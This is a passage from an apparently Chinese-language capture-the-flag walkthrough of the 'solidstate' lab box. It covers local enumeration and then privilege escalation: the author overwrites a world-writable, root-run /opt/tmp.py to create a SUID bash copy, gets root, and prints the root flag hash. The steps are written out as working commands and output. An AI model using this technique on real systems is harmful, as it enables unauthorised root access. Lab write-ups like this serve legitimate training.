drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 share

./.local/share:
total 56
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 ..
drwx------  2 james osboxes 4096 Jun 18  2017 applications
drwx------  7 james osboxes 4096 Jun 18  2017 evolution
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 folks
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 gnome-settings-daemon
drwx------  2 james osboxes 4096 Jun 18  2017 gnome-shell
drwx------  2 james osboxes 4096 Aug 22  2017 gvfs-metadata
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 icc
drwx------  2 james osboxes 4096 Aug 22  2017 keyrings
drwx------  2 james osboxes 4096 Jun 18  2017 sounds
drwx------  3 james osboxes 4096 Jun 18  2017 telepathy
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 tracker
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 xorg
ls: cannot open directory './.local/share/applications': Permission denied
ls: cannot open directory './.local/share/evolution': Permission denied

./.local/share/folks:
total 8
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
-rw-------  1 james osboxes    0 Aug 22  2017 relationships.ini

./.local/share/gnome-settings-daemon:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
-rw-r--r--  1 james osboxes    0 Jun 18  2017 input-sources-converted
ls: cannot open directory './.local/share/gnome-shell': Permission denied
ls: cannot open directory './.local/share/gvfs-metadata': Permission denied

./.local/share/icc:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
ls: cannot open directory './.local/share/keyrings': Permission denied
ls: cannot open directory './.local/share/sounds': Permission denied
ls: cannot open directory './.local/share/telepathy': Permission denied

./.local/share/tracker:
total 12
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 14 james osboxes 4096 Aug 22  2017 ..
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 data

./.local/share/tracker/data:
total 220
drwxr-xr-x 2 james osboxes   4096 Aug 22  2017 .
drwxr-xr-x 3 james osboxes   4096 Jun 18  2017 ..
-rw-r----- 1 james osboxes 139096 Aug 22  2017 tracker-store.journal
-rw-r----- 1 james osboxes  74725 Jun 18  2017 tracker-store.ontology.journal

./.local/share/xorg:
total 56
drwxr-xr-x  2 james osboxes  4096 Aug 22  2017 .
drwxr-xr-x 14 james osboxes  4096 Aug 22  2017 ..
-rw-r--r--  1 james osboxes 21679 Aug 22  2017 Xorg.0.log
-rw-r--r--  1 james osboxes 21678 Jun 18  2017 Xorg.0.log.old

./Music:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./.nano:
total 8
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Pictures:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Public:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
ls: cannot open directory './.ssh': Permission denied

./Templates:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Videos:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$

使用ls -alR  进行递归搜索，但是也没有可用信息！

提权

1、系统信息收集

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ sudo -l
bash: sudo: command not found

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 9.0 (stretch)
Release:        9.0
Codename:       stretch

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cat /etc/passwd | grep "home" | grep -v nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   2107 Aug 22  2017 /etc/passwd
-rw-r----- 1 root shadow 1375 Aug 22  2017 /etc/shadow
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/sbin/pppd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper

2、恶意脚本提取

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cd opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -al
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$

找了一大堆东西，最后我们在opt目录下找到了一个py文件。

看起来是一个 Python 脚本，使用 `os.system` 函数调用 `rm -r /tmp/*` 命令来删除 `/tmp/` 目录下的所有文件和子目录。
如果删除操作失败，脚本将会使用 `sys.exit()` 终止程序。

我们只需要替换脚本需要执行的内容即可！

cp \/bin\/bash \/home\/mindy\/shell;chmod 4777 \/home\/mindy\/shell

不要为了转义。

cp /opt/tmp.py ~/1.py

cat 1.py | sed 's/rm -r \/tmp\/\* /cp \/bin\/bash \/home\/mindy\/shell;chmod 4777 \/home\/mindy\/shell/g' >> 2.py


${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat 2.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('cp /bin/bash /home/mindy/shell;chmod 4777 /home/mindy/shell')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat 2.py > /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('cp /bin/bash /home/mindy/shell;chmod 4777 /home/mindy/shell')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd mindy/
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -al
total 1272
drwxr-x--- 4 mindy mindy    4096 Dec 17 22:51 .
drwxr-xr-x 4 root  root     4096 Aug 22  2017 ..
-rwxr-xr-x 1 mindy mindy     105 Dec 17 22:38 1.py
-rw-r--r-- 1 mindy mindy     151 Dec 17 22:48 2.py
-rw-r--r-- 1 root  root        0 Aug 22  2017 .bash_history
-rw-r--r-- 1 root  root        0 Aug 22  2017 .bash_logout
-rw-r--r-- 1 root  root      338 Aug 22  2017 .bash_profile
-rw-r--r-- 1 root  root     1001 Aug 22  2017 .bashrc
drwxr-x--- 2 mindy mindy    4096 Aug 22  2017 bin
-rw------- 1 root  root        0 Aug 22  2017 .rhosts
-rwsrwxrwx 1 root  root  1265272 Dec 17 22:51 shell
-rw------- 1 root  root        0 Aug 22  2017 .shosts
drw------- 2 root  root     4096 Aug 22  2017 .ssh
-rw------- 1 mindy mindy      34 Aug 22  2017 user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$


自动执行tmp.py并且成功执行，mindy目录下生成了可执行文件shell。

get root

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./shell -p
shell-4.4# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
shell-4.4# whoami
root
shell-4.4# cd /root
shell-4.4# ls
root.txt
shell-4.4# cat root.txt
b4c9723a28899b1c45db281d99cc87c9
shell-4.4#